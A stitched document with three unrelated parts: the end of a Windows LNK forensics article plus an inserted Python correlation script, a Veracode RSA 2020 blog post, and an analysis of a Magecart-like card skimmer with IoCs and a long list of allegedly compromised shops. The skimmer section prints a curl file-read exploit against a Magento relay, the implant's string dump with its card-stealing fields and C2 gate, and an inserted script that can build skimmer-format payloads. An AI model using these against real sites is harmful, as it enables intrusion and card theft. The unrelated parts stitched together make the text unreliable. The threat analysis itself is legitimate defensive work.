     1e3ee840-bc2b-476c-8237-2acd1a839b22\12     (Description not available)         ==> Null
     1e3ee840-bc2b-476c-8237-2acd1a839b22\20     (Description not available)         ==> 1
     1e3ee840-bc2b-476c-8237-2acd1a839b22\3      (Description not available)         ==> document
     1e3ee840-bc2b-476c-8237-2acd1a839b22\17     (Description not available)         ==> {1685D4AB-A51B-4AF1-A4E5-CEE87002431D}.Merge Any
     1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> C:\<file path>\password2.txt
     b725f130-47ef-101a-a5f1-02608c9eebac\4      Item Type Text                      ==> Text Document
     b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> password2
     b725f130-47ef-101a-a5f1-02608c9eebac\12     Size                                ==> 19
     b725f130-47ef-101a-a5f1-02608c9eebac\14     Date Modified                       ==> 01/11/2010 16:57:11
     006fdbaa-864f-4d1c-a8e8-e62772e454fe\11     (Description not available)         ==> 59
     006fdbaa-864f-4d1c-a8e8-e62772e454fe\13     (Description not available)         ==> 1077936423
     cf5be8c0-236c-4ad3-bace-cd608a2748d7\100    (Description not available)         ==> True
     e3e0584c-b788-4a5a-bb20-7f5a44c9acdd\6      Item Folder Path Display            ==> C:\<file path>

--- End Target ID information ---

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   (Property store is empty)

>> Tracker database block
   Machine ID: <hostname>
   MAC Address: <mac address>
   MAC Vendor: VMWARE
   Creation: 2019-11-13 04:29:24

   Volume Droid: <volume>
   Volume Droid Birth: <volume>
   File Droid: <file>
   File Droid birth: <file>

Figure 9: LECmd.exe output for password2.lnk

The takeaway here is that user search LNK files are keyed only on the search term, not on the search context. This means that a later search for the same term, e.g. passw, in a different drive or directory, where the user subsequently opens a search result, updates the modification timestamp of the existing user search LNK file as well as the search context stored inside it. This keeps in step with LNK shortcut files, which are keyed on the simple filename—not the full file path.

Timestamp Interpretation

Historically, due to the structure of the WordWheelQuery registry key and the timestamps available in the Windows Registry, investigators could only determine the search time of the most recent term, using the last modification time of the registry key. With user search LNK files, new timestamps are available to determine the times a user searched for a specific term and subsequently opened a file from the search. Going further, we can combine evidence from the user search LNK files and the WordWheelQuery MRUListEx registry value to infer the order of searches completed by the user. For instance, since the user searched for gov (WordWheelQuery search index 4), passw (index 6), and private (index 7), we can infer they also searched for air (index 5) but didn't open any files resulting from this search.
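The correlation described above, as an added Python example that is not code from the Mandiant article: it parses a WordWheelQuery MRUListEx value into the ordered search history of Figure 5, then combines it with the user search LNK timestamps of Figure 6 to bound each term's first and last search. The registry bytes and LNK timestamps are constructed here to mirror the figures, and the index-order and MRU-order rules are the article's own reading of the artefacts.

```python
"""Correlate Explorer WordWheelQuery history with user search LNK files.

Added example (not from the Mandiant article). Registry bytes and LNK
timestamps are constructed below to mirror Figures 5 and 6.
"""
from __future__ import annotations

import struct
from datetime import datetime
from typing import Dict, List, Optional, Tuple


def parse_mrulistex(raw: bytes) -> List[int]:
    """MRUListEx is a REG_BINARY run of little-endian uint32 value indexes,
    most recently used first, terminated by 0xFFFFFFFF."""
    order: List[int] = []
    for off in range(0, len(raw) - 3, 4):
        (idx,) = struct.unpack_from("<I", raw, off)
        if idx == 0xFFFFFFFF:
            break
        order.append(idx)
    return order


def decode_term(raw: bytes) -> str:
    """Each numbered value holds one NUL-terminated UTF-16LE search string."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def search_history(values: Dict[str, bytes]) -> List[Tuple[int, str]]:
    """(index, term) pairs in MRUListEx order: the view RegRipper prints in Figure 5."""
    return [(i, decode_term(values[str(i)])) for i in parse_mrulistex(values["MRUListEx"])]


def correlate(history: List[Tuple[int, str]],
              lnk_times: Dict[str, Tuple[datetime, datetime]]) -> Dict[str, dict]:
    """Per-term search bounds from both artefacts.

    history:   (index, term) in MRUListEx order, most recent first.
    lnk_times: term -> (created, modified) of <term>.lnk in the Recent folder, UTC.

    Rules, following the article: a value index is assigned on a term's first
    search, so ascending index is first-search order; MRUListEx is most-recent-
    search order; <term>.lnk created/modified are searches for that term in which
    a result was opened. A search that opened nothing leaves no LNK, so the bounds
    are one-sided: first_search is bounded above, last_search below.
    """
    created = {t: c for t, (c, _) in lnk_times.items()}
    modified = {t: m for t, (_, m) in lnk_times.items()}
    by_index = [t for _, t in sorted(history)]      # first-search order, oldest first
    by_mru = [t for _, t in reversed(history)]      # last-search order, oldest first
    result: Dict[str, dict] = {}
    for _, term in history:
        i = by_index.index(term)
        m = by_mru.index(term)
        # the first search of `term` precedes the first search of every later index
        not_after = min((created[t] for t in by_index[i:] if t in created), default=None)
        # the last search of `term` follows the last search of every older MRU entry
        not_before = max((modified[t] for t in by_mru[:m + 1] if t in modified), default=None)
        result[term] = {
            "first_search_not_after": not_after,
            "last_search_not_before": not_before,
            # None here is the article's "searched, but opened no result"
            "opened_result_at": lnk_times.get(term),
        }
    return result


# --- constructed sample data mirroring Figures 5 and 6 (not the real registry) ---
_TERMS = ["global", "*.ps1", "adhealthcheck", "intelsat", "gov", "air", "passw", "private",
          "dni", "apple", "*.cfg", "aaa", "bbb", "ccc", "Secret"]   # value index == position
_MRU_ORDER = [14, 6, 13, 12, 11, 10, 9, 8, 7, 4, 5, 3, 2, 1, 0]
REG_VALUES: Dict[str, bytes] = {str(i): (t + "\x00").encode("utf-16-le")
                                for i, t in enumerate(_TERMS)}
REG_VALUES["MRUListEx"] = struct.pack("<%dI" % (len(_MRU_ORDER) + 1), *_MRU_ORDER, 0xFFFFFFFF)

LNK_TIMES = {  # <term>.lnk (created, modified) from Figure 6
    "gov": (datetime(2019, 11, 9, 8, 33, 14), datetime(2019, 11, 9, 8, 33, 14)),
    "private": (datetime(2019, 11, 9, 9, 29, 11), datetime(2019, 11, 9, 9, 29, 37)),
    "passw": (datetime(2019, 11, 9, 8, 38, 29), datetime(2019, 11, 13, 6, 47, 56)),
    "Secret": (datetime(2019, 11, 13, 6, 57, 3), datetime(2019, 11, 13, 6, 57, 25)),
}

if __name__ == "__main__":
    for term, info in correlate(search_history(REG_VALUES), LNK_TIMES).items():
        print(f"{term:14} first<= {info['first_search_not_after']}  "
              f"last>= {info['last_search_not_before']}  lnk={info['opened_result_at']}")
```

Run against a real hive, the numbered values and MRUListEx bytes come straight from the WordWheelQuery key and the timestamps from the Recent folder; the output for air reproduces the article's inference (searched after gov, no later than the first passw search, no result opened).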

Conclusion

LNK shortcut files have been a reliable method to determine user access to files and the associated file metadata at the time of access. With user search LNK files, we can now enrich our Windows Explorer search history findings and gain a more detailed picture of user activity through additional timestamps of user Explorer searches with subsequent access to files from the search.

Acknowledgements

Thank you to Phillip Kealy and William Ballenthin for technical review and providing feedback on overall presentation.

RSA 2020 and the Human Element of Security

RSA is fast approaching, and as we here at Veracode are busy prepping for our trip out to San Francisco, we have been thinking about the theme of this year’s RSA conference — “the human element” — and what that means for us and for application security.

The RSA Conference website explains that the “human element” theme this year highlights that “the actions we [security] take can affect every aspect of humanity. We’re the ones on the front lines, protecting not just data, but our most vulnerable people and every aspect of our lives.” Coincidentally, we just published a compilation of Veracode customer profiles, Spotlight on Companies Changing the World: How Software and Security Are Transforming the Way We Live. This compilation highlights the fact that Veracode is not just securing software; our customers are changing the world and making a positive impact on communities and lives with software, and we’re partnering with them to protect and support those initiatives. As software increasingly touches every aspect of our lives — from healthcare to education to government — the security partnership becomes more and more critical, and we take that very seriously.

There are human elements in what we are protecting, but there are also human elements in how we are protecting. We spend a lot of time talking to our customers and prospects about the fact that effective application security requires more than technology — here are some of the AppSec “human elements” that play a critical role in successful programs:

Collaboration Between Security and Development

As application security has “shifted left” earlier in development cycles, security and development teams need to understand each other and work together more than ever before. A recently published Securosis report titled, Building an Enterprise DevSecOps Program, sums it up well:

“Most security practitioners come from a network security background, and many CISOs we speak with are more risk and compliance focused, so there is a general lack of understanding of software development. This lack of knowledge of development tooling and processes, along with common challenges developers are trying to overcome, means security teams seldom understand why automated build servers, central code repositories, containers, Agile and DevOps have caught fire and have been widely adopted in a very short time.”

The report goes on to advise security professionals:

“You need to consider how you can improve delivery of secure code without waste and without introducing bottlenecks in a development process you may not be intimately familiar with. The good news is that security fits nicely within a DevOps model, but you need to tailor things to work within your organization's automation and orchestration to be successful.”

Bottom line for security professionals: Get to know and understand your development teams and their pain points and priorities. You won’t be able to effectively secure their processes without this understanding. In addition, consider adding developer security training to the mix. Most developers don’t have the security skills or know-how they need to code securely — it’s simply not taught in the vast majority of universities, or offered on the job. Work to understand their processes, and enable them to understand yours. Our guide, The Security Professional’s Role in a DevSecOps World, is a good starting point.

Security Champions

Another low-tech, human AppSec element that’s been coming up in customer conversations recently — security champions. In the report referenced above, Securosis analyst Adrian Lane writes, “I spoke with three midsized firms this week — their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25. They typically had two or three security personnel with backgrounds in application security. They may be rare as unicorns, but that does not give them magical powers to cover all development operations, so they need ways to scale their experience across the enterprise. And they need to do it in a way which meshes with development objectives, getting software development teams to implement their security controls.” He goes on to say, “One of the most effective methods I have discovered to scale security is to deputize willing developers with an active interest in security to be ‘security champions’ on their development teams.”

Security champions are like security force multipliers on development teams. Security champions don’t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization’s security experts to provide guidance.

Visit Us at RSA

Let’s continue the conversation at RSA. Stop by our booth, N 5553, to see a product demo or chat with one of our experts. See this web page for details on our speaking sessions, and on how to schedule a meeting with one of our execs. Hope to see you there!

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of interest to you. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not one hundred percent sure that the discovered implant is an evolution of Magecart, since the activation scripts are quite different even if they do use the Magento core infrastructure. To my current understanding, we might be facing a new Magecart version or a new framework as well; notes and suggestions are always welcome.

Disclaimer

National law enforcement units have been alerted; a few hours have passed since they gave me the authorization to publish this post. If you used your credit card on one of the following eCommerce sites (IoC section), please consider your credit card no longer private: call your bank and follow the deactivation steps. Since the C2 and relays are still up and running, the addresses have been obfuscated in order to avoid replication. I want to thank Daniele B. for giving me the first “wired eCommerce”.

Analysis

Everything starts from a vulnerable eCommerce website. The user doesn't notice anything weird: she fills her cart as usual, surfing from page to page, viewing and selecting items, and finally decides to check out, either by registering a new account or by proceeding as a guest. However, the attacker can abuse the eCommerce site's vulnerabilities to introduce a nasty JavaScript that sends information (for example: name, address, email, credit card number, CVV, expiration date, and so on) to another host belonging to the cyber-criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.]php . This POST carries a quite interesting payload, partially shown (to avoid an info leak) in the next code section.


The encrypted/encoded data lands on an external gate hosted on *****.]com. This is slightly different behavior compared to the original Magecart, which used to send data directly in base64 format. The relay host looks like a legitimate eCommerce website that was compromised and used as a relay (one more difference from Magecart). A further investigation of such a relay shows a Magento core installation (a common indicator of Magecart) which includes js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php), a tool for dynamically building up a composite JavaScript file to improve performance and compression rates. By using such public Magento-core functionality and by guessing file paths (looking for known public folders on the host helps in guessing paths), we might obtain the original malicious back-end file injected by the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:


We are now facing the initial stage of obfuscated PHP code. The following image (Fig2) shows how the attacker obfuscated the first stage. Note the activation variable "touch", which activates the process in both flavors: GET and POST. Once the activation variable is found, a compressed and encoded payload is fitted into a multiple-variable concatenation chain and later executed (eval).

Fig2: Payload Stage 1

By following the reverse obfuscation chain we end up with the following code (Fig3). This time the attacker used more obfuscation techniques, from charset differentiation to junk code and random comments scattered around to make the overall reading quite hard. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset, I was able to extract the decoding loop and to quickly understand the payload behavior.

Fig3: Payload Stage 3

Indeed, once the script decodes the payload received from the compromised eCommerce site (by rotating over charsets with hard-coded strings; Fig3 decodes the touch variable content), every stolen field is ordered into a crafted object and sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section helps us understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;
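Added example (my code, not the post's and not the implant's): a triage helper a defender could run over POST bodies captured by a store's proxy or WAF to confirm a skimmer exfiltration and list which checkout fields left the site, without re-exposing card numbers in a report. It assumes the `touch` value is the URL-encoded field string written as hex with the two nibbles of every byte swapped (`h` = 0x68 appears as `86`), which is my reading of the sample quoted earlier in the post, not a claim the post makes about the stage-3 decoder; the field names come from the string dump above, and the host names and card data are constructed placeholders.

```python
"""Triage helper for the `touch=` skimmer exfiltration format discussed above.

Added example, not code from the post. Assumption (also stated in the lead-in):
the `touch` value is the URL-encoded field string as hex with the two nibbles of
every byte swapped, so 'h' (0x68) is sent as "86". That is my reading of the
post's sample, not something the post states about the stage-3 decoder.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Field names the stage-3 script extracts (taken from the string dump in the post).
KNOWN_FIELDS = {
    "host", "number", "exp1", "exp2", "cvv", "firstname", "lastname",
    "address", "city", "state", "zip", "country", "phone", "email",
}
SENSITIVE_FIELDS = {"number", "cvv", "exp1", "exp2"}

# A `touch` parameter whose value is a long run of hex digits.
TOUCH_RE = re.compile(r"(?:^|&)touch=([0-9a-fA-F]{40,})(?:&|$)")


def swap_nibbles_hex(hexstr: str) -> bytes:
    """Undo the nibble swap ("86" -> "68") and decode the hex string to bytes."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex payload")
    swapped = "".join(hexstr[i + 1] + hexstr[i] for i in range(0, len(hexstr), 2))
    return bytes.fromhex(swapped)


def decode_touch(body: str) -> Optional[dict]:
    """Return the exfiltrated form fields if `body` carries a touch payload, else None."""
    m = TOUCH_RE.search(body)
    if not m:
        return None
    try:
        raw = swap_nibbles_hex(m.group(1)).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    fields = {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}
    # Require overlap with the skimmer's field set so that unrelated long hex
    # values (session tokens, hashes) are not reported as skimmer traffic.
    if len(KNOWN_FIELDS & set(fields)) < 3:
        return None
    return fields


def mask_pan(pan: str) -> str:
    """Keep BIN and last four digits only, so findings can be shared safely."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 10:
        return "*" * len(digits)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def triage(request_host: str, store_host: str, body: str) -> Optional[dict]:
    """Flag a POST carrying checkout data, noting whether it left the store's origin."""
    fields = decode_touch(body)
    if fields is None:
        return None
    return {
        "exfil_host": request_host,
        "external": request_host.lower() != store_host.lower(),
        "victim_host": fields.get("host", ""),
        "pan_masked": mask_pan(fields.get("number", "")),
        "sensitive_fields": sorted(SENSITIVE_FIELDS & set(fields)),
        "email": fields.get("email", ""),
    }


def encode_touch(fields: dict) -> str:
    """Build a body in the same format; used here only to construct test input."""
    raw = urlencode(fields).encode("utf-8").hex()
    return "touch=" + "".join(raw[i + 1] + raw[i] for i in range(0, len(raw), 2))


# Constructed sample: a fake checkout form packaged the way the skimmer would.
SAMPLE_FIELDS = {
    "host": "shop.example-store.test",
    "number": "4111111111111111",  # well-known test PAN, not a real card
    "exp1": "2", "exp2": "2025", "cvv": "123",
    "firstname": "Jane", "lastname": "Doe",
    "address": "1 Example Way", "city": "Testville", "state": "CA",
    "zip": "90000", "country": "US", "phone": "5550100",
    "email": "jane@example.test",
}
SAMPLE_BODY = encode_touch(SAMPLE_FIELDS)

if __name__ == "__main__":
    print(triage("relay.example.test", "shop.example-store.test", SAMPLE_BODY))
```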

We have one more host that needs to be analyzed. Taking a closer look at the domain used, we might agree that it looks like the final proxy gate, which stores data in a database (MongoDB). Again, by enumerating and seeking through its public information it was actually possible to spot and enumerate the technology used to host the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker's infrastructure components – I was able to build a simple monitoring script which revealed the most used compromised eCommerce sites.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we would have no idea about the overall magnitude of the infection chain, since many eCommerce sites could have a low selling rate (rate of customers during my monitoring phase). In that case, even if they are compromised, it is very hard to discover every compromised eCommerce site by using this technique: looking at, converting and importing the temporary files generated every time a data leak happens (every time a user enters a credit card). So we might end up needing another method. Fortunately the host has a PTR (pointer record) to mo-------.]fvds].ru, as shown in Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recalls the email address used to register mag^^^^^^.]su (mo------@protonmail.]com) in a unique way. By the way, it has been active since 2019-07!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record to understand how many known websites have links pointing to mo-----.]fvds.]ru, you find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce sites. Now, I am not saying that every single eCommerce site in the list has been compromised, but taking 3 of them at random (reported in the IoC section) I found the exact infection chain on each one. So potentially every eCommerce site on that list (that is, every one pointing to the command and control) should be checked.

Fig6: Links to mo-------.]fvds.]ru

According to urlscan.io, most of the websites pointing to mo-------.]fvds.]ru follow the geographic distribution shown in Fig7. Most are US based, followed by RU, NL and IN. While it's hard to say that this is a targeted attack against US eCommerce websites, the stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

IoC

The following IoCs have been extracted from the command and control as described in the Analysis section. I have evidence that these eCommerce sites send credit card numbers to the C2 (mag^^^^^^.]su), but I did not analyse every single eCommerce site outside the "High Confidence" list, and the others could be compromised through different infection chains. More potentially compromised eCommerce sites could be found; a large unverified list ("Low Confidence") follows.

High Confidence Compromised:

– (POST): https://*****/js/ar/ar2497.php
– Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
– mom*****@protonmail.]com (email used to register C2)
– ——.]com (relay)
– https://^^^^^^^^^.]su/gate/proxy (C2)
– mom*****.]fvds].ru (PTR)

Low Confidence Compromised (more investigation is needed):
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://gemastrology.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]airckmoaw.]com/
URL: http://www.]kevinbuou.]com/
URL: http://www.]fiskrose.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://jacksvapes.]com/
URL: http://garudakart.]com/
URL: http://www.]bowtiqueuk.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: https://goodprice.]net/customer/account/login
URL: http://hotelcathedrale.]be/
URL: https://www.]khadiindia.]in/
URL: http://www.]qdp.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: https://www.]ezy-care.]co.]uk/
URL: http://mehtagems.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]mynumberplates.]com/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]fashionaxe.]com/
URL: http://philippelebac.]fr/
URL: http://hotelcathedrale.]be/
URL: http://bagsymalone.]in/
URL: https://www.]tec-heads.]com/
URL: http://www.]bowtiqueuk.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]officecorrect.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://dhyanaa.]com/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://motornets.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]ewrjuant.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]repkcory.]com/
URL: http://www.]supritam.]com/
URL: http://www.]matexbuyer.]com/
URL: http://www.]blazovic.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://falcontraders.]co.]uk/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: http://www.]mslzaric.]com/
URL: http://www.]clairnewt.]com/
URL: https://www.]denimvenim.]com/
URL: http://www.]coslflybiod.]com/
URL: http://www.]mirnkola.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://www.]solaroutdoorlightingdisplay.]com/
URL: http://www.]airckmoaw.]com/
URL: http://doctor-alcrimea.]ru/
URL: https://herbaloja.]online/
URL: http://pharmatrades.]com/
URL: http://www.]nadiarey.]com/
URL: http://coitoys.]com/
URL: http://oculosdahora.]com.]br/
URL: http://om10.]ru/
URL: http://www.]treosportswear.]com/
URL: http://shopgbpi.]co.]uk/
URL: https://www.]niwuma.]com/
URL: http://www.]hoaquathanhhang.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]farmcraft.]at/
URL: http://bookmyo.]com/
URL: http://masterlyweft.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://www.]bukserhe.]com/
URL: http://smallpenfactory.]com.]au/
URL: http://www.]autocleaningbrunssum.]nl/
URL: http://www.]laboutiqueachapeaux.]com/
URL: http://batubati.]hu/
URL: http://demolicaomoveis.]com.]br/
URL: http://www.]superdin.]com.]br/
URL: http://www.]tonyonlinestore.]com/
URL: http://www.]descontosemhoteis.]com.]br/
URL: http://garudakart.]com/
URL: http://jutebazaar.]com/
URL: http://www.]leilachodo.]com/
URL: http://newstudytour.]com/
URL: http://www.]zamarimarcondes.]com.]br/
URL: http://fisiolifepilates.]com.]br/
URL: https://dload.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://kiiroousa.]com/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: https://www.]baleyo.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://oomph.]com.]sg/
URL: http://hotelcathedrale.]be/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]myvanaccessories.]co.]uk/
URL: https://www.]ezy-care.]co.]uk/
URL: http://english-furniture.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://aquasport.]sigmacell.]in/
URL: http://hotelcathedrale.]be/
URL: http://worldstogether.]com/
URL: http://www.]matexbuyer.]com/
URL: https://www.]arenaflorist.]com/
URL: http://www.]blendystraw.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: http://www.]arquegym.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]reviewlista.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kupu.]es/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]mynumberplates.]com/
URL: https://myphonetics.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]opticalsupplies.]com/
URL: https://www.]ezy-care.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]doftec.]com/
URL: http://garudakart.]com/
URL: http://legalprintllc.]com/
URL: http://lukasandlara.]com/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: https://myphonetics.]com/
URL: http://alltradeshowdisplay.]com/
URL: http://www.]virmans.]com/
URL: http://www.]gramton.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://english-furniture.]co.]uk/
URL: http://stonemanasia.]com/
URL: http://jacksvapes.]com/
URL: http://unsquashaball.]com/
URL: https://www.]eyewear69.]my/
URL: http://www.]vandrugboards.]com/
URL: http://qandmantiqueluxury.]com/
URL: http://hivepackaging.]com/
URL: http://www.]4d-printology.]com/
URL: http://hotelcathedrale.]be/
URL: http://diamondwrapfactory.]com/
URL: http://petanyway.]net/index.]php/why-not-available/
URL: http://hotelcathedrale.]be/
URL: http://www.]lobsters.]com.]sg/
URL: https://www.]arenaflorist.]com/
URL: http://www.]mrsflorist.]co.]in/
URL: http://www.]loosen-up.]com/
URL: http://labdooshoes.]com/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://eshop.]wengthyelot54.]com/
URL: https://mustardoc.]com/
URL: http://hotelcathedrale.]be/
URL: https://electroshopnow.]com/
URL: http://kmmachinery.]com/
URL: http://kmglasstools.]com/
URL: http://hotelcathedrale.]be/
URL: http://dealelement.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]xentogo.]com/
URL: http://hotelcathedrale.]be/
URL: http://shoefactoryindia.]com/
URL: http://hotelcathedrale.]be/
URL: http://solarinfrasystems.]com/
URL: https://electroshopnow.]com/
URL: https://www.]macroman.]in/
URL: http://juwelier-tarasek.]de/
URL: https://dourosoptika.]gr/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]uiterkits.]com/
URL: http://de-lices.]ru/
URL: http://hotelcathedrale.]be/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://rpkorea.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]fashionaxe.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://fenxiangheaven.]com/
URL: http://www.]i91cloud.]com/
URL: https://www.]ikonmotorsports.]com/
URL: https://gorusticx.]com/
URL: http://www.]lobsters.]com.]sg/
URL: http://www.]ororganicliving.]com/
URL: http://www.]lifestylea-list.]com/
URL: http://www.]grovz.]com/
URL: http://diamondwrapfactory.]com/
URL: http://omniscrubs.]com/
URL: http://www.]4d-printology.]com/
URL: http://www.]northhillco.]com/
URL: http://devdantona.]com/
URL: http://deeprosso.]com/
URL: http://www.]fashionaxe.]com/
URL: http://www.]iousi.]com.]cn/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]eurekacosmetics.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://www.]virmanishop.]com/
URL: http://goofballstuff.]com/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]baudacarlota.]com.]br/index.]php
URL: http://www.]baudacarlota.]com.]br/index.]php|
URL: http://www.]baudacarlota.]com.]br/index.]php
URL: http://www.]baudacarlota.]com.]br/index.]php|
URL: http://hotelcathedrale.]be/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]cityflorist.]co.]in/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://goldwithyou.]com/
URL: http://hotelcathedrale.]be/
URL: https://herbaloja.]online/
URL: http://www.]surprise.]ps/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/
URL: http://www.]magento.]flyermonster.]de/
URL: http://hotelcathedrale.]be/
URL: https://deals4kart.]com/
URL: http://academycreative.]cz/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://cuberra.]eu/
URL: http://hotelcathedrale.]be/
URL: https://www.]smclinic.]bg/
URL: http://shoefactoryindia.]com/
URL: http://www.]fiskrose.]com/
URL: https://myworldphone.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kevinbuou.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.]php?route=checkout/checkout
URL: https://deals4kart.]com/
URL: http://www.]fangshicube.]com/
URL: http://www.]gpmbv.]com/
URL: http://va-store.]de/
